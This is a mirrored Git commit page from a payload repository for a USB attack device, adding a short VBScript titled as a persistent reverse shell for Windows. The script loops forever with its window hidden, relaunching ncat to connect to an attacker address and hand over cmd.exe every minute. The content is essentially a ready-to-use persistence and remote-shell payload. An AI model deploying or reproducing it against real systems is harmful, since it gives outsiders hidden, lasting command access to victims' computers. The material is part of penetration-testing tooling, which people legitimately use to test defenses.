mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Persistent Reverse Shells for MacOS and Windows 10 (#306)
This commit is contained in:
@@ -0,0 +1,7 @@
|
||||
Dim ncShell
|
||||
Set ncShell = WScript.CreateObject("WScript.shell")
|
||||
|
||||
Do while True:
|
||||
ncShell.Run "powershell.exe C:\temp\ncat.exe ATTACKER_IP PORT -e cmd.exe", 0, true
|
||||
WScript.Sleep(60000)
|
||||
loop
|
||||
Reference in New Issue
Block a user